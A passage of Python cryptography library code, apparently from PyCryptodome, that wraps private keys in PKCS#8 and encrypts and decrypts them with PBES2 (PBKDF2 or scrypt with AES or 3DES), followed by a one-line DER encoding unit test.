= Random.new().read if protection == 'PBKDF2WithHMAC-SHA1AndDES-EDE3-CBC': key_size = 24 module = DES3 cipher_mode = DES3.MODE_CBC enc_oid = "1.2.840.113549.3.7" elif protection in ('PBKDF2WithHMAC-SHA1AndAES128-CBC', 'scryptAndAES128-CBC'): key_size = 16 module = AES cipher_mode = AES.MODE_CBC enc_oid = "2.16.840.1.101.3.4.1.2" elif protection in ('PBKDF2WithHMAC-SHA1AndAES192-CBC', 'scryptAndAES192-CBC'): key_size = 24 module = AES cipher_mode = AES.MODE_CBC enc_oid = "2.16.840.1.101.3.4.1.22" elif protection in ('PBKDF2WithHMAC-SHA1AndAES256-CBC', 'scryptAndAES256-CBC'): key_size = 32 module = AES cipher_mode = AES.MODE_CBC enc_oid = "2.16.840.1.101.3.4.1.42" else: raise ValueError("Unknown mode") # Get random data iv = randfunc(module.block_size) salt = randfunc(prot_params.get("salt_size", 8)) # Derive key from password if protection.startswith('PBKDF2'): count = prot_params.get("iteration_count", 1000) key = PBKDF2(passphrase, salt, key_size, count) key_derivation_func = newDerSequence( DerObjectId("1.2.840.113549.1.5.12"), # PBKDF2 newDerSequence(DerOctetString(salt), DerInteger(count))) else: # It must be scrypt count = prot_params.get("iteration_count", 16384) scrypt_r = prot_params.get('block_size', 8) scrypt_p = prot_params.get('parallelization', 1) key = scrypt(passphrase, salt, key_size, count, scrypt_r, scrypt_p) key_derivation_func = newDerSequence( DerObjectId("1.3.6.1.4.1.11591.4.11"), # scrypt newDerSequence(DerOctetString(salt), DerInteger(count), DerInteger(scrypt_r), DerInteger(scrypt_p))) # Create cipher and use it cipher = module.new(key, cipher_mode, iv) encrypted_data = cipher.encrypt(pad(data, cipher.block_size)) encryption_scheme = newDerSequence(DerObjectId(enc_oid), DerOctetString(iv)) # Result encrypted_private_key_info = newDerSequence( # encryptionAlgorithm newDerSequence( DerObjectId("1.2.840.113549.1.5.13"), # PBES2 newDerSequence(key_derivation_func, encryption_scheme), ), DerOctetString(encrypted_data)) return encrypted_private_key_info.encode()
def wrap(private_key, key_oid, passphrase=None, protection=None, prot_params=None, key_params=None, randfunc=None): """Wrap a private key into a PKCS#8 blob (clear or encrypted). :Parameters: private_key : byte string The private key encoded in binary form. The actual encoding is algorithm specific. In most cases, it is DER. key_oid : string The object identifier (OID) of the private key to wrap. It is a dotted string, like "``1.2.840.113549.1.1.1``" (for RSA keys). passphrase : (binary) string The secret passphrase from which the wrapping key is derived. Set it only if encryption is required. protection : string The identifier of the algorithm to use for securely wrapping the key. The default value is '``PBKDF2WithHMAC-SHA1AndDES-EDE3-CBC``'. prot_params : dictionary Parameters for the protection algorithm. +------------------+-----------------------------------------------+ | Key | Description | +==================+===============================================+ | iteration_count | The KDF algorithm is repeated several times to| | | slow down brute force attacks on passwords | | | (called *N* or CPU/memory cost in scrypt). | | | | | | The default value for PBKDF2 is 1 000. | | | The default value for scrypt is 16 384. | +------------------+-----------------------------------------------+ | salt_size | Salt is used to thwart dictionary and rainbow | | | attacks on passwords. The default value is 8 | | | bytes. | +------------------+-----------------------------------------------+ | block_size | *(scrypt only)* Memory-cost (r). The default | | | value is 8. | +------------------+-----------------------------------------------+ | parallelization | *(scrypt only)* CPU-cost (p). The default | | | value is 1. | +------------------+-----------------------------------------------+ key_params : DER object The algorithm parameters associated to the private key. It is required for algorithms like DSA, but not for others like RSA. randfunc : callable Random number generation function; it should accept a single integer N and return a string of random data, N bytes long. If not specified, a new RNG will be instantiated from ``Crypto.Random``. :Return: The PKCS#8-wrapped private key (possibly encrypted), as a binary string. """ if key_params is None: key_params = DerNull() # # PrivateKeyInfo ::= SEQUENCE { # version Version, # privateKeyAlgorithm PrivateKeyAlgorithmIdentifier, # privateKey PrivateKey, # attributes [0] IMPLICIT Attributes OPTIONAL # } # pk_info = DerSequence([ 0, DerSequence([DerObjectId(key_oid), key_params]), DerOctetString(private_key) ]) pk_info_der = pk_info.encode() if passphrase is None: return pk_info_der if not passphrase: raise ValueError("Empty passphrase") # Encryption with PBES2 passphrase = tobytes(passphrase) if protection is None: protection = 'PBKDF2WithHMAC-SHA1AndDES-EDE3-CBC' return PBES2.encrypt(pk_info_der, passphrase, protection, prot_params, randfunc)
def decrypt(data, passphrase): """Decrypt a piece of data using a passphrase and *PBES2*. The algorithm to use is automatically detected. :Parameters: data : byte string The piece of data to decrypt. passphrase : byte string The passphrase to use for decrypting the data. :Returns: The decrypted data, as a binary string. """ enc_private_key_info = DerSequence().decode(data, nr_elements=2) enc_algo = DerSequence().decode(enc_private_key_info[0]) encrypted_data = DerOctetString().decode( enc_private_key_info[1]).payload pbe_oid = DerObjectId().decode(enc_algo[0]).value if pbe_oid != "1.2.840.113549.1.5.13": raise PbesError("Not a PBES2 object") pbes2_params = DerSequence().decode(enc_algo[1], nr_elements=2) ### Key Derivation Function selection kdf_info = DerSequence().decode(pbes2_params[0], nr_elements=2) kdf_oid = DerObjectId().decode(kdf_info[0]).value # We only support PBKDF2 or scrypt if kdf_oid == "1.2.840.113549.1.5.12": pbkdf2_params = DerSequence().decode(kdf_info[1], nr_elements=(2, 3, 4)) salt = DerOctetString().decode(pbkdf2_params[0]).payload iteration_count = pbkdf2_params[1] if len(pbkdf2_params) > 2: kdf_key_length = pbkdf2_params[2] else: kdf_key_length = None if len(pbkdf2_params) > 3: raise PbesError("Unsupported PRF for PBKDF2") elif kdf_oid == "1.3.6.1.4.1.11591.4.11": scrypt_params = DerSequence().decode(kdf_info[1], nr_elements=(4, 5)) salt = DerOctetString().decode(scrypt_params[0]).payload iteration_count, scrypt_r, scrypt_p = [ scrypt_params[x] for x in (1, 2, 3) ] if len(scrypt_params) > 4: kdf_key_length = scrypt_params[4] else: kdf_key_length = None else: raise PbesError("Unsupported PBES2 KDF") ### Cipher selection enc_info = DerSequence().decode(pbes2_params[1]) enc_oid = DerObjectId().decode(enc_info[0]).value if enc_oid == "1.2.840.113549.3.7": # DES_EDE3_CBC ciphermod = DES3 key_size = 24 elif enc_oid == "2.16.840.1.101.3.4.1.2": # AES128_CBC ciphermod = AES key_size = 16 elif enc_oid == "2.16.840.1.101.3.4.1.22": # AES192_CBC ciphermod = AES key_size = 24 elif enc_oid == "2.16.840.1.101.3.4.1.42": # AES256_CBC ciphermod = AES key_size = 32 else: raise PbesError("Unsupported PBES2 cipher") if kdf_key_length and kdf_key_length != key_size: raise PbesError("Mismatch between PBES2 KDF parameters" " and selected cipher") IV = DerOctetString().decode(enc_info[1]).payload # Create cipher if kdf_oid == "1.2.840.113549.1.5.12": # PBKDF2 key = PBKDF2(passphrase, salt, key_size, iteration_count) else: key = scrypt(passphrase, salt, key_size, iteration_count, scrypt_r, scrypt_p) cipher = ciphermod.new(key, ciphermod.MODE_CBC, IV) # Decrypt data pt = cipher.decrypt(encrypted_data) return unpad(pt, cipher.block_size)
def testInit1(self): der = DerOctetString(b('\xFF')) self.assertEqual(der.encode(), b('\x04\x01\xFF'))